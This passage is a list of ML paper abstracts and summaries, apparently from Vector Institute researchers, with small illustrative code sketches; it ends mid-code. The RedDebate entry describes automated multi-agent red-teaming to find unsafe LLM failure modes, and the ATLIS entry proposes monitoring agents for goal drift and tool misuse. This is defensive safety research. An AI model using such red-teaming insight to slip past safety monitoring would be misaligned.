The ability to reliably predict how cells respond to perturbations in the lab could save years and resources in the drug development pipeline. However, algorithms designed for this purpose currently face controversy: several high-profile methods claim outstanding performance, while independent benchmarking finds their results worse than simply predicting an average. In our paper, we explore this discrepancy and trace the issue to unexpected behaviours of common metrics when applied to high-dimensional gene expression data.
We trace the main culprit to a needle-in-the-haystack problem: only a tiny fraction of genes changes meaningfully under a perturbation. This means that an average prediction is actually correct for the vast majority of genes but wrong for the ones that matter. Current metrics don’t account for this and hence reward statistically safe predictions over biologically informative ones. Using these insights, we propose a novel standard protocol for evaluating model performance that includes two new niche-sensitive metrics along with positive and negative controls.
We then realized one of these metrics could be repurposed as a training signal. Under this new supervision, models improved relative to their original training when evaluated on independent metrics. This finding was replicated across multiple method families, suggesting that focusing on strong niche signals is an effective strategy for learning how cells respond to perturbations.
TLDR: When perturbation effects are sparse, unweighted metrics reward mean predictions; DEG-aware metrics and weighted training restore sensitivity and improve performance.
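The dilution effect can be reproduced on a toy example. The sketch below assumes a simple per-gene weight vector (large for differentially expressed genes, small elsewhere); the weights and function names are hypothetical, and the paper's exact WMSE weighting is not reproduced here.

```python
def mse(pred, target):
    """Unweighted mean-squared error over genes."""
    return sum((p - t) ** 2 for p, t in zip(pred, target)) / len(target)


def weighted_mse(pred, target, weights):
    """Weighted MSE with weights normalized to sum to 1 (assumed scheme)."""
    total = sum(weights)
    return sum(w * (p - t) ** 2 for w, p, t in zip(weights, pred, target)) / total


# Toy perturbation: 100 genes, only 2 respond (the "needles").
n_genes = 100
target = [0.0] * n_genes
target[0], target[1] = 3.0, -2.0

# Hypothetical DEG-aware weights: high for responding genes, tiny elsewhere.
weights = [1.0 if i < 2 else 0.01 for i in range(n_genes)]

# A mean-style baseline that predicts "no change" for every gene.
mean_baseline = [0.0] * n_genes

print(mse(mean_baseline, target))                    # error diluted across all genes
print(weighted_mse(mean_baseline, target, weights))  # error concentrated on the DEGs
```

The unweighted score makes the baseline look nearly perfect because 98 of 100 genes are predicted correctly, whereas the weighted score exposes that it misses every gene that actually changed.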
On Group Relative Policy Optimization Collapse in Agent Search: The Lazy Likelihood-Displacement
Wenlong Deng, Yushu Li, Boying Gong, Yi Ren, Christos Thrampoulidis, Xiaoxiao Li (Vector Faculty Member)
Abstract
Tool-integrated (TI) reinforcement learning (RL) enables large language models (LLMs) to perform multi-step reasoning by interacting with external tools such as search engines and retrievers. Group Relative Policy Optimization (GRPO), exemplified by the recent Search-R1, offers fast convergence and a value-free formulation that makes it appealing for this setting, yet consistently suffers from training collapse. We identify Lazy Likelihood Displacement (LLD), a systematic reduction or stagnation in the likelihood of both correct and incorrect responses, as the core mechanism driving this failure. LLD emerges early and triggers a self-reinforcing LLD Death Spiral, where declining likelihood leads to low-confidence responses, inflating gradients, and ultimately causing collapse. We empirically characterize this process across models on a Search-R1-style, search-integrated question answering task, revealing a consistent three-phase trajectory: early stagnation, steady decay, and accelerated collapse. To address this, we propose a likelihood-preserving regularization LLDS that activates only when a response action’s likelihood decreases, and regularizes only the tokens responsible. This fine-grained structure mitigates LLD with minimal interference. Our method stabilizes training, prevents gradient explosion, and yields substantial performance improvements across seven benchmarks, including relative improvements of +45.2% on Qwen2.5-3B and +37.1% on Qwen2.5-7B over vanilla GRPO training. Our results establish LLD as a previously overlooked bottleneck in GRPO-based TIRL and provide a practical path toward stable, scalable training of tool-integrated RL.
Summary
Tool-integrated reinforcement learning allows large language models to solve complex tasks by using external tools such as search engines. However, a popular training method called GRPO often becomes unstable and collapses during training.
We identify the main cause of this failure, called Lazy Likelihood Displacement (LLD), where the model gradually loses confidence in both correct and incorrect answers, leading to unstable updates and eventual collapse. To address this, we propose LLDS, a lightweight stabilization method that selectively prevents harmful confidence drops.
Our approach stabilizes training, avoids gradient explosion, and significantly improves performance across seven benchmarks, achieving gains of up to 45.2% over standard GRPO training. These results provide a practical path toward more reliable and scalable tool-using AI systems.
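The selective behaviour described above (act only when a response becomes less likely, and only on the tokens responsible) can be sketched as follows. This is a hypothetical illustration: `lld_penalty` is an invented name, and the gating and hinge form are assumptions rather than the paper's exact LLDS formula.

```python
def lld_penalty(old_logps, new_logps):
    """Hypothetical likelihood-preserving penalty for a single response.

    old_logps / new_logps: per-token log-probabilities under the previous
    and the updated policy.
    """
    # Gate: do nothing unless the whole response became less likely.
    if sum(new_logps) >= sum(old_logps):
        return 0.0
    # Penalize only the tokens whose log-probability dropped.
    return sum(max(0.0, o - n) for o, n in zip(old_logps, new_logps))


old = [-0.5, -1.0, -0.2]
improved = [-0.4, -1.1, -0.1]   # total likelihood went up: gate stays closed
degraded = [-0.5, -2.0, -0.1]   # total went down, driven by the second token

print(lld_penalty(old, improved))
print(lld_penalty(old, degraded))
```

In the degraded case only the second token contributes to the penalty, even though the third token also changed, because the third token became more likely rather than less.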
OptiFluence: Principled Design of Privacy Canaries
Mohammad Yaghini, Michael Aerni, Junrui Zhang, Nicolas Papernot (Vector Faculty Member), Florian Tramer
Abstract
Privacy auditing has emerged as a practical tool for empirically estimating training data leakage in machine learning models, in contrast to the provable but often overly pessimistic bounds provided by differential privacy analysis. A common strategy is to use membership inference attacks to detect the presence of specific canaries—data points chosen to maximize attack success—in training data. However, existing canary designs are largely heuristic, relying on mislabeled or out-of-distribution samples. We address this gap by formulating canary design as a bilevel optimization problem, where the model is trained in the inner loop and the canary is optimized in the outer loop to maximize its detectability. To solve this problem, we develop OptiFluence, a scalable optimization framework that combines (i) initialization by selecting candidates using influence functions and (ii) unrolled optimization with memory-efficient techniques. Our approach achieves remarkable empirical performance on four datasets. Optimized canaries achieve near-perfect detection rates of 99.6% true positive rate at 0.1% false positive rate on CIFAR-10, outperforming in-distribution baselines by 4$\times$. Critically, these canaries transfer effectively across different model architectures without retraining, enabling practical third-party privacy audits. This transferability allows regulators and auditors to assess model privacy without requiring access to proprietary training infrastructure or substantial computational resources.
Summary
When AI systems are trained on sensitive personal data (medical records, financial transactions, or private messages), they can inadvertently “memorize” details about specific individuals. This creates a real privacy risk: an adversary may be able to determine whether a particular person’s data was used to train a model, even without seeing the training data directly.
Privacy auditing helps measure and expose this risk. A common technique inserts special “canary” data points into the training set and then tests whether an attacker can reliably detect which canaries were included. Canaries that are easy to detect reveal high privacy risk; hard-to-detect canaries may give a false sense of security. Current approaches design canaries by hand using rough heuristics, such as mislabeled or unusual images, which can miss real leakage.
We developed OptiFluence, a method that uses mathematical optimization to design canaries that are as detectable as possible. Across four image datasets, including a medical skin-lesion dataset, our optimized canaries are caught with near-perfect accuracy, far outperforming hand-crafted alternatives. Importantly, canaries designed for one model work equally well on different, larger models. This means a regulator or independent auditor can design canaries once and use them to scrutinize many AI systems, without requiring access to any proprietary training infrastructure.
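Detection results of this kind are typically reported as a true positive rate at a fixed, low false positive rate. The sketch below shows one simple way to compute that number from attack scores; the function name, the toy scores, and the thresholding convention are assumptions for illustration, not the paper's evaluation code.

```python
def tpr_at_fpr(member_scores, nonmember_scores, target_fpr):
    """True positive rate at a threshold chosen so that FPR <= target_fpr.

    Higher score means "more likely to have been in the training set".
    """
    negatives = sorted(nonmember_scores, reverse=True)
    # Number of non-members we are allowed to flag by mistake.
    allowed_fp = int(target_fpr * len(negatives))
    # Flag a point only if it scores strictly above this threshold.
    if allowed_fp < len(negatives):
        threshold = negatives[allowed_fp]
    else:
        threshold = float("-inf")
    true_positives = sum(score > threshold for score in member_scores)
    return true_positives / len(member_scores)


# Toy attack scores for canaries that were / were not in the training set.
included = [0.9, 0.8, 0.75, 0.3]
excluded = [0.85, 0.7, 0.6, 0.5, 0.4, 0.35, 0.3, 0.2, 0.1, 0.05]

print(tpr_at_fpr(included, excluded, target_fpr=0.1))
print(tpr_at_fpr(included, excluded, target_fpr=0.0))
```

A well-designed canary pushes the "included" scores far above the "excluded" ones, so the rate stays high even when almost no false positives are tolerated.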
Position: Accountable Deployment of Agentic AI Demands Layered, System-Level Interpretability
Judy Zhu (Vector Project Manager), Dhari Gandhi (Vector Project Manager), Ahmad Mianroodi (Vector Applied AI Intern), Dhanesh Ramachandram (Vector Applied Machine Learning Scientist), Sedef Akinli Kocak (Vector Director, Applied AI Projects), Shaina Raza (Vector Applied Machine Learning Scientist, Responsible AI)
Abstract
Agentic AI systems behave through trajectories: they plan, invoke tools, update memory, and coordinate over multiple steps. However, interpretability remains largely model-centric, focused on explaining single predictions rather than tracing long-horizon behavior and responsibility across interacting components. As a result, critical failures, such as tool misuse, coordination breakdowns, or goal drift, often evade existing audits until harm occurs. We argue that interpretability for agentic systems must become system-centric, addressing trajectories, responsibility assignment, and lifecycle dynamics rather than internal model mechanisms alone. We advance three claims: interpretability must (1) co-evolve with agentic capabilities, (2) address distinct layers of opacity with tailored methods, and (3) integrate across the deployment lifecycle. To operationalize this position, we introduce ATLIS (Agentic Trajectory and Layered Interpretability Stack), a framework integrating five interpretability layers across a five-stage deployment lifecycle. ATLIS enables lightweight continuous monitoring with risk-aware escalation to deeper system-level analysis when incidents are detected. ATLIS provides a blueprint for closing the growing gap between agentic capabilities and the interpretability infrastructure needed to govern them.
Position: Make Planning Research Rigorous Again!
Michael Katz, Harsha Kokel, Christian Muise (Vector Faculty Affiliate), Shirin Sohrabi, Sarath Sreedharan
Abstract
In the more than sixty years since its inception, the field of planning has made significant contributions to both the theory and practice of building planning software that can solve a never-before-seen planning problem. This was done through established practices of rigorous design and evaluation of planning systems. It is our position that this rigor should be applied to the current trend of work on planning with large language models. One way to do so is by correctly incorporating the insights, tools, and data from the automated planning community into the design and evaluation of LLM-based planners. The experience and expertise of the planning community could play a crucial role in accelerating the development of LLM-based planners. This position is particularly important in light of the abundance of recent works that replicate and propagate the same pitfalls that the planning community has encountered and learned from. We believe that establishing practices that avoid such known pitfalls will contribute greatly to the progress in building LLM-based planners and to planning in general.
Position: Sustainable Open-Source AI Requires Tracking the Cumulative Footprint of Derivatives
Spotlight paper
Shaina Raza (Vector Applied Machine Learning Scientist, Responsible AI), Iuliia Zarubiieva, Ahmed Radwan (Associate Applied ML Specialist), Nathaniel Lesperance, Deval Pandya (former Vector VP, AI Engineering), Sedef Akinli Kocak (Vector Director, Applied AI Projects), Graham Taylor (Vector Faculty Member)
Abstract
Open-source AI is scaling rapidly, and model hubs now host millions of artifacts. Each foundation model can spawn large numbers of fine-tunes, adapters, quantizations, merges, and forks. We take the position that compute efficiency alone is insufficient for sustainability in open-source AI. Lower per-run costs can accelerate experimentation and deployment, increasing aggregate footprint unless impacts are measurable and comparable across derivative lineages. However, the energy use, water consumption, and emissions of these derivative lineages are rarely measured or disclosed in a consistent, comparable way, leaving aggregate ecosystem impact largely invisible. We argue that sustainable open-source AI requires a coordination infrastructure that tracks impacts across model lineages, not only base models. We propose Data and Impact Accounting (DIA), a lightweight, non-restrictive transparency layer that (i) standardizes carbon-and-water reporting metadata, (ii) integrates low-friction measurement into common training and inference pipelines, and (iii) aggregates reports via public dashboards to summarize cumulative impacts across releases and derivatives. DIA makes derivative costs visible and supports ecosystem-level accountability while preserving openness.
Position: The Case for Theory-Level Autoformalization
Spotlight paper
Marcus Min, Deyuan Mike He, Zhaoyu Li, Zixuan Yi, Sharad Malik, Aarti Gupta, Xujie Si (Vector Faculty Affiliate), Osbert Bastani
Abstract
Autoformalization, translating informal natural language into formal, machine-verifiable languages, has been framed as a tool to generate training data for neural theorem provers, with most work focusing on individual statements. This position paper argues for theory-level autoformalization: formalizing complete theories, including axioms, definitions, theorems, proofs, tactics, and their inter-dependencies as structured libraries. We examine the significance of this shift, address 3 alternative views, identify 5 open challenges, and propose 3 promising paths forward.
Position: We Need Large Language Models Optimized For Our Well-Being
Ashton Anderson (Vector Faculty Affiliate), Harsh Kumar, Louis Tay, Karina Vold
Abstract
Contemporary large language models are predominantly trained using reinforcement learning from human feedback (RLHF), optimizing for immediate user approval rather than long-term well-being. This position paper argues that as AI systems increasingly serve socioemotional functions, this optimization strategy poses significant risks. Recent evidence demonstrates that leading models exhibit systematic sycophancy, affirming inappropriate user behaviors and preserving user face at rates far exceeding human baselines, while being approximately 40% more likely to reinforce incorrect beliefs than their non-RLHF counterparts. We contend that the AI community must fundamentally reconsider training objectives to balance short-term satisfaction with long-term user outcomes. We propose three directions: (1) incorporating longitudinal metrics into training that capture sustained goal attainment and reduced regret rather than momentary preference, (2) enabling explicit user choice among interaction modes (concierge, collaborator, coach) with transparent justification for model pushback, and (3) developing frameworks that provide constructive challenge without paternalism. The recent industry backlashes against both excessive and insufficient model agreeableness underscore the urgency of this shift. We argue that optimizing AI systems for human flourishing, not merely human approval, represents both an ethical imperative and a path to more sustainable, trustworthy AI deployment.
Position: When AI Decides Who Gets an Organ: Multi-Agentic AI Systems in Transplant Medicine Risk Amplifying Disparities Without Targeted Explainability and Deployment Strategies
Divya Sharma, Ghazal Azarfar, Bima Hasjim, Mamatha Bhat (Vector Faculty Affiliate)
Abstract
Agentic AI systems, particularly those built on large language models (LLMs) and deployed as autonomous, role-specialized agents, are rapidly emerging in clinical decision-making. This position paper argues that without equity and explainability as core design constraints, such systems will exacerbate healthcare disparities. Using empirical evidence from a multi-agent simulation of a liver transplant selection committee, we demonstrate that even high-performing agents can systematically disadvantage patients based on sex, ethnicity, and socioeconomic status. These disparities arise from agents’ reliance on non-clinical proxy variables (insurance type, education level, area deprivation index) and are compounded by the lack of case-level explanations and temporally grounded reasoning. We further contend that without fairness-aware deployment strategies, such systems cannot be reliably audited or ethically integrated into real-world care. In response, we propose a technical roadmap with subgroup-sensitive learning objectives, counterfactual reasoning modules, clinician-in-the-loop governance, and deployment protocols that address the digital divide. We urge the machine learning community to centre explainability and health equity in the development and deployment of agentic AI for medicine, especially in high-stakes domains where algorithmic decisions may determine who lives and who does not.
Post-Training with Policy Gradients: Optimality and the Base Model Barrier
Spotlight paper
Alireza Mousavi-Hosseini, Murat Erdogdu (Vector Faculty Member)
Abstract
We study post-training linear autoregressive models with outcome and process rewards. Given a context $x$, the model must predict the response $y \in \mathcal{Y}^N$, a sequence of length $N$ that satisfies a $\gamma$ margin condition, an extension of the standard separability to sequences. We prove that on test samples where the base model achieves a non-trivial likelihood $\alpha$, a variant of policy gradient (PG) can achieve likelihood $1 - \varepsilon$ with an essentially minimax optimal number of reward queries $\tilde{\mathcal{O}}((\alpha^{-1} + \varepsilon^{-1})/\gamma^2)$. However, a barrier arises for going beyond the support of the base model. We prove that the overall expected error after post-training with outcome rewards is governed by a property of the base model called the *Likelihood Quantile* (LQ), and that variants of PG, while minimax optimal, may require a number of reward queries exponential in $N$ to go beyond this support, regardless of the pre-training algorithm. To overcome this barrier, we study post-training with a process reward model, and demonstrate how PG variants in this setting avoid the curse of dimensionality in $N$ via dependence on a token-level LQ. Along the way, we prove that under the margin condition, SGD with adaptive learning rate (LR) achieves a near optimal test error for statistical learning, and PG with adaptive LR achieves a near optimal number of mistakes for online learning while being computationally efficient whenever possible, both of which may be of independent interest.
Summary
Using reinforcement learning with verifiable rewards (RLVR) has emerged as a popular approach to improve the reasoning capability of Large Language Models (LLMs). However, it is not clear if RLVR is teaching truly new capabilities that were absent in the base model, or reweighting the model to make certain completions that were already within the support of the base model more likely.
In this paper, we study a theoretically tractable model of autoregressive policies, and provide a rigorous characterization of the effect of the pre-trained base model on the success of RL. We define a property of the base model that we call *Likelihood Quantile*, which we show can be used to predict the final performance of RL. Our analysis shows that when relying only on sparse *outcome rewards*, the post-trained model cannot efficiently go beyond the support of the base model. Moreover, in our setting, we establish the minimax optimality of SGD with adaptive learning rates as a pre-training algorithm, and of policy gradient with adaptive learning rates for RL. Therefore, this limitation, which we call the base model barrier, is fundamental and not due to the choice of algorithms in practice.
We further prove that using dense *process rewards* for post-training overcomes the base model barrier. Our results provide a theoretical foundation that highlights both the necessity and sufficiency of process rewards for efficient exploration in post-training beyond the base model support.
TLDR: We study variants of policy gradients for post-training linear autoregressive models, establish their optimality, and characterize the hardness of going beyond the base model’s support.
Predicting evolutionary rate as a pretraining task improves genome language model representations
Micaela Consens, Kevin Yang, James Hall, Ashley Conard, Bo Wang (Vector Faculty Member), Lorin Crawford, Alan Moses, Alex Lu
Abstract
Genome language models (gLM) have the potential to further understanding of regulatory genomics without requiring labeled data. Most gLMs are pretrained using sequence reconstruction tasks inspired by natural language processing, but recent studies have shown that these gLMs often fail to capture biological signal. To overcome this, we introduce pretraining tasks that predict the rate of evolution. These tasks are designed so that they can be composed with sequence reconstruction, enabling a controlled comparison of predicting sequence only, evolutionary rate only, or both. To address gaps in existing evaluations, we developed a suite of biologically grounded benchmarks.
Across these tasks, and for established variant effect prediction benchmarks, models pretrained on both sequence and evolutionary rate outperform those trained on sequence alone, and training on evolutionary rate can make even the relatively small models in our work competitive with much larger existing gLMs for some tasks on the human genome. These results establish evolution as a key training target for genome-scale models.
Summary
Genome language models are deep learning models trained on DNA, with the goal of learning useful representations of the genome in the same way that language models learn useful representations of text. Most of these models are trained by reconstructing DNA sequence, similar to how language models learn by predicting missing or next words. However, recent studies suggest that this training strategy does not always recover known biological signals.
We introduce a new way to train genome language models: instead of only reconstructing DNA, the models also predict how evolutionarily conserved or accelerated each DNA base pair in the human genome is. This is useful because evolution acts as a proxy for function: important genomic positions often change more slowly across species. Our method lets us directly compare models trained on sequence alone, evolution alone, or both sequence and evolution.
We also develop biologically grounded evaluations to address gaps in existing benchmarks for genome language models. Across these evaluations, and on established variant effect prediction tasks, models trained with evolution outperform models trained on sequence alone. In some cases, even our relatively small models become competitive with much larger genome language models on the human genome. These results suggest that evolution should be a central training signal for genome-scale models.
TLDR: Adding evolutionary rate prediction to genome language model pre-training improves their representation capacity, enabling small models (<100M parameters) to compete with models over 10× larger.
Predicting Large Model Test Losses with a Noisy Quadratic System
Chuning Li, Chris Maddison (Vector Faculty Member)
Abstract
We introduce a predictive model that estimates the pre-training loss of large models from model size ($N$), batch size ($B$) and number of weight updates ($K$). This is the first loss prediction model that can handle changing batch size. The model outperforms Chinchilla’s loss model, a model of the test loss using the model size and number of tokens, in terms of projecting the loss at extrapolated compute budgets (up to 1000-fold). A natural use of the model is to find optimal $N,B,K$ configurations under explicit and compound resource constraints like time, memory and compute. In our experiments, the model-selected configurations are close to ground-truth optimal. Our work advocates for loss prediction as a better alternative to heuristic-based laws, which are growing in complexity. The implementation is available at https://github.com/chuningxdy/Noisy-Quadratic-System.
Summary
Training large AI models is expensive, so deciding how big a model should be, how much data it should process at once, and how long it should train can involve a lot of costly trial and error. Existing scaling laws such as Chinchilla offer helpful guidance, but are less flexible in accounting for practical training choices and can be less reliable when predicting much larger training runs. This paper introduces a predictive model that estimates training performance directly from a few key design choices, which helps researchers plan efficient training runs under real-world constraints like compute, memory, and time. This approach could make AI development less wasteful.
TLDR: Predicting large model test loss using model size, batch size, and number of weight updates.
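For context, a Chinchilla-style parametric loss is usually written as a function of model size and total training tokens only. The sketch below uses placeholder constants and hypothetical function names to show why such a form cannot distinguish two runs that trade batch size against number of updates, which is the gap a model in $(N, B, K)$ is meant to address. It is not the paper's noisy quadratic system.

```python
def chinchilla_style_loss(n_params, n_tokens,
                          irreducible=1.7, coef_n=400.0, coef_d=400.0,
                          alpha=0.34, beta=0.28):
    """Parametric loss of the form E + A / N**alpha + B / D**beta.

    The default constants are illustrative placeholders, not fitted values.
    """
    return irreducible + coef_n / n_params ** alpha + coef_d / n_tokens ** beta


def tokens_seen(batch_size_tokens, num_updates):
    """Total training tokens when every update consumes one batch."""
    return batch_size_tokens * num_updates


# Same model size and same token budget, but very different batch sizes.
small_batch = chinchilla_style_loss(1e9, tokens_seen(1_000_000, 20_000))
large_batch = chinchilla_style_loss(1e9, tokens_seen(4_000_000, 5_000))

print(small_batch == large_batch)  # True: the form only sees the product B * K
```

Because the two configurations collapse to the same prediction, a token-based form offers no guidance on how to split a fixed token budget between batch size and training steps.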
Private and Stable Test-time Adaptation with Differential Privacy
Zefeng Li, Qiaoyue Tang, Mathias Lécuyer, Evan Shelhamer (Vector Faculty Member)
Abstract
Test-time adaptation (TTA) can reduce error on new and different data by updating the model on these inputs during inference. However, these updates raise the issue of privacy w.r.t. the testing data, because the model parameters now depend on all past inputs. To control this privacy risk, we cast multiple popular TTA methods (Tent, EATA, SAR, DeYO, and COME) into differential privacy (DP) forms that apply per-sample gradient clipping and Gaussian noise for all updates. On ImageNet-C, our DP-TTA methods provide adequate privacy at small cost to accuracy, and in the low-privacy regime the clipping mechanism of DP can even improve the accuracy and stability of adaptation in the continual setting. These improvements to privacy and accuracy come at only modest computational overhead. These first results on private TTA raise awareness of the issue, inform the development of more private test-time updates, and identify per-sample clipping as an effective technique for improving the accuracy and stability of adaptation.
Summary
Machine learning models are often trained in clean and controlled settings. However, real-world deployment data is constantly changing. Test-time adaptation is a technique that allows models to adjust themselves after deployment, so they can better handle slightly different data, such as blurred, noisy, or degraded inputs. However, this update process can be unstable because the model adapts using feedback from its own predictions rather than true answers. When the incoming data is highly corrupted, these signals can be misleading, causing the model to reinforce its own mistakes and suffer drops in performance.
Test-time adaptation also creates privacy risks: adaptation changes embed information about test-time data into the model. This information could later be extracted by a malicious attacker. Our work studies how to make this adaptation process stable and privacy-preserving. We develop methods that combine test-time adaptation with differential privacy, a rigorous mathematical framework for limiting information leakage. By carefully controlling and perturbing model updates, we make models adapt to new data with high and stable predictive performance, while reducing the risk of revealing details about previously seen deployment data.
TLDR: Making test-time updates respect differential privacy delivers principled private test-time adaptation and its clipping mechanism even improves non-private optimization.
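The two ingredients named in the abstract, per-sample gradient clipping and Gaussian noise, can be sketched in the style of DP-SGD. The function names, the noise scale convention (`noise_multiplier * max_norm`), and the toy gradients are assumptions for illustration; the paper's DP-TTA methods and privacy accounting are not reproduced here.

```python
import math
import random


def clip(grad, max_norm):
    """Rescale one per-sample gradient so its L2 norm is at most max_norm."""
    norm = math.sqrt(sum(g * g for g in grad))
    scale = min(1.0, max_norm / norm) if norm > 0 else 1.0
    return [g * scale for g in grad]


def private_update(per_sample_grads, max_norm, noise_multiplier, rng):
    """Clip each sample's gradient, sum, add Gaussian noise, then average."""
    dim = len(per_sample_grads[0])
    clipped = [clip(g, max_norm) for g in per_sample_grads]
    summed = [sum(g[i] for g in clipped) for i in range(dim)]
    sigma = noise_multiplier * max_norm
    noisy = [s + rng.gauss(0.0, sigma) for s in summed]
    return [v / len(per_sample_grads) for v in noisy]


# One outlier gradient (norm 5) and one ordinary gradient (norm 0.5).
grads = [[3.0, 4.0], [0.3, 0.4]]
rng = random.Random(0)

print(private_update(grads, max_norm=1.0, noise_multiplier=0.0, rng=rng))
print(private_update(grads, max_norm=1.0, noise_multiplier=1.0, rng=rng))
```

Even with the noise switched off, clipping limits how much a single corrupted input can move the model, which is consistent with the stability benefit the abstract attributes to per-sample clipping.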
Rectified LpJEPA: Joint-Embedding Predictive Architectures with Sparse and Maximum-Entropy Representations
Yilun Kuang, Yash Dagade, Tim G. J. Rudner (incoming Vector Faculty Member), Randall Balestriero, Yann LeCun
Abstract
Joint-Embedding Predictive Architectures (JEPA) learn view-invariant representations and admit projection-based distribution matching for collapse prevention. Existing approaches regularize representations towards isotropic Gaussian distributions, but inherently favor dense representations and fail to capture the key property of sparsity observed in efficient representations. We introduce Rectified Distribution Matching Regularization (RDMReg), a sliced two-sample distribution-matching loss that aligns representations to a Rectified Generalized Gaussian (RGG) distribution. RGG enables explicit control over expected $\ell_0$ norm through rectification, while its continuous truncated component admits a maximum-entropy characterization under expected $\ell_p$ norm and support constraints. Equipping JEPAs with RDMReg yields Rectified LpJEPA, which strictly generalizes prior Gaussian-based JEPAs. Empirically, Rectified LpJEPA learns sparse, non-negative representations with favourable sparsity–performance trade-offs and competitive downstream performance on image classification benchmarks, showing that RDMReg can enforce sparsity while preserving task-relevant information.
Summary
Modern AI systems learn internal representations of data such as images, but these representations are often dense and hard to interpret. We introduce a method for training self-supervised models to learn sparse representations, where only a small number of units are active for each input, while still preserving useful information. On image classification benchmarks, our method produces sparse, non-negative representations with competitive performance, suggesting that AI systems can be encouraged to use more compact and structured internal descriptions without losing task-relevant information.
TLDR: We introduce Rectified LpJEPA, a JEPA model equipped with Rectified Distribution Matching Regularization (RDMReg), yielding sparse and maximum-entropy representations with competitive downstream performance.
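As a rough illustration of the two ingredients named above (not the authors' implementation), the sketch below samples a rectified Gaussian and compares two sample sets with a sliced distance. It assumes the Gaussian special case of the generalized Gaussian, and the function names, the shift `mu`, and the choice of a squared 1-D Wasserstein-2 distance per slice are all hypothetical choices made for this example.

```python
import numpy as np

def sample_rectified_gaussian(n, d, mu, sigma, rng):
    """Draw n samples of max(0, z), with z ~ N(mu, sigma^2) in each coordinate."""
    z = rng.normal(loc=mu, scale=sigma, size=(n, d))
    return np.maximum(z, 0.0)

def sliced_two_sample_distance(x, y, num_projections, rng):
    """Mean squared 1-D Wasserstein-2 distance over random unit directions.

    Assumes x and y contain the same number of samples, so sorted projections
    can be compared element by element.
    """
    d = x.shape[1]
    dirs = rng.normal(size=(d, num_projections))
    dirs /= np.linalg.norm(dirs, axis=0, keepdims=True)
    px = np.sort(x @ dirs, axis=0)
    py = np.sort(y @ dirs, axis=0)
    return float(np.mean((px - py) ** 2))

rng = np.random.default_rng(0)
target = sample_rectified_gaussian(2048, 16, mu=-1.0, sigma=1.0, rng=rng)

# Rectification zeroes every coordinate with z <= 0, so the shift mu sets the
# expected fraction of active units: P(z > 0) = Phi(mu / sigma), about 0.16 here.
active_fraction = float(np.mean(target > 0))

# A dense Gaussian batch sits far from the sparse target; a fresh rectified batch sits close.
dense = rng.normal(size=(2048, 16))
sparse = sample_rectified_gaussian(2048, 16, mu=-1.0, sigma=1.0, rng=rng)
dist_dense = sliced_two_sample_distance(dense, target, 64, rng)
dist_sparse = sliced_two_sample_distance(sparse, target, 64, rng)
```

In a training loop, a distance of this kind would be applied to learned embeddings rather than to synthetic batches; the example only shows how rectification ties sparsity to a single distribution parameter.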
RedDebate: Safer Responses Through Multi-Agent Red Teaming Debates
Ali Asad, Stephen Obadinma, Radin Shayanfar, Xiaodan Zhu (Vector Faculty Member)
Abstract
We introduce RedDebate, a novel multi-agent debate framework that provides the foundation for Large Language Models (LLMs) to identify and mitigate their own unsafe behaviors. Existing AI safety approaches often rely on costly human evaluation or isolated single-model assessment, both constrained by scalability and prone to oversight failures. RedDebate employs collaborative argumentation among multiple LLMs across diverse debate scenarios, enabling them to critically evaluate one another’s reasoning and systematically uncover unsafe failure modes through fully automated red-teaming. We further integrate distinct long-term memory modules that preserve safety-relevant insights from debate interactions and leverage them during subsequent inference, facilitating continuous refinement of model behavior. Empirical evaluation on safety benchmarks across a diverse set of models demonstrates that RedDebate substantially reduces unsafe outputs. While debate alone allows LLMs to refine their behavior, the addition of memory modules yields further significant reductions. To the best of our knowledge, RedDebate is the first fully automated framework to unify multi-agent debate and red-teaming to progressively enhance LLM safety without human intervention.
Summary
Large language models (LLMs) are becoming increasingly capable, but they can still produce harmful, biased, or unsafe responses. Improving their safety often depends on extensive human oversight, which can be expensive, slow, and difficult to scale. In this work, we introduce RedDebate, a fully automated system that helps AI models identify and reduce their own unsafe behavior by debating with one another.
In RedDebate, multiple AI agents engage in structured discussions where they challenge, critique, and evaluate each other’s responses across a wide range of harmful or risky scenarios. Through these debates, the models are able to uncover weaknesses and unsafe reasoning that a single model might miss on its own. The system also includes long-term memory components that store important safety lessons learned during previous debates and reuse them in future interactions, allowing the models to continuously improve over time.
We evaluate RedDebate on several AI safety benchmarks using different language models and show that it significantly reduces unsafe outputs. Our results demonstrate that debate alone can improve model safety, while adding memory leads to even greater improvements. To the best of our knowledge, this is the first fully automated framework that combines multi-agent debate and AI red-teaming to progressively improve language model safety without requiring human intervention.
TLDR: RedDebate uses AI agents to debate, critique, and learn from unsafe responses, continuously improving LLM safety through automated red-teaming and memory-based learning.
Reinforcement Learning with Action-Triggered Observations
Alexander Ryabchenko, Wenlong Mou (Vector Faculty Affiliate)
Abstract
We introduce Action-Triggered Sporadically Traceable Markov Decision Processes (ATST-MDPs), a reinforcement learning framework for partial observability in which full state observations occur stochastically at each step, with probability determined by the chosen action. We derive Bellman equations tailored to this setting and establish the existence of an optimal policy. Exploiting the fact that sporadic observations reveal the full state, we provide an equivalent formulation in which agents commit to action-sequences between consecutive observations. Under the linear MDP assumption, we show that the value function over such action-sequences admits a linear representation in a finite-dimensional feature map, enabling standard regression-based methods. As an application, we derive ATST-LSVI-UCB, an optimistic algorithm achieving regret $\widetilde{O}(\sqrt{Kd^3(1-\gamma)^{-3}})$ for episodic learning with geometrically distributed horizons, where $K$ is the number of episodes, $d$ the feature dimension, and $\gamma$ the discount factor (episode continuation probability), matching the known rate for linear MDPs with full observability.
Summary
This paper studies reinforcement learning in settings where an agent does not always observe the next state after taking an action. Such situations arise in domains like healthcare and finance, where reliable information may require actions that trigger tests, measurements, or other costly observations. We introduce a model in which each action has its own probability of revealing the next state. We show that, between observations, the agent can be viewed as planning a sequence of actions. This structure leads to an efficient learning algorithm with strong guarantees, benchmarked against the best policy subject to the same observation constraints.
TLDR: Rigorous analysis of reinforcement learning in scenarios where actions probabilistically trigger full state observations.
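The observation model described above can be sketched with a toy environment. This is a minimal illustration under stated assumptions, not the paper's formal construction: the chain dynamics, the class name `ActionTriggeredEnv`, and the `rollout` helper are hypothetical. The helper groups actions into the sequences an agent effectively commits to between consecutive observations.

```python
import random

class ActionTriggeredEnv:
    """Toy chain MDP in which each action reveals the next state with its own probability."""

    def __init__(self, n_states, observe_prob, seed=0):
        self.n_states = n_states
        self.observe_prob = observe_prob  # maps action -> probability of observing
        self.rng = random.Random(seed)
        self.state = 0

    def step(self, action):
        # Hypothetical dynamics: action 1 moves right, any other action moves left.
        move = 1 if action == 1 else -1
        self.state = min(max(self.state + move, 0), self.n_states - 1)
        observed = self.rng.random() < self.observe_prob[action]
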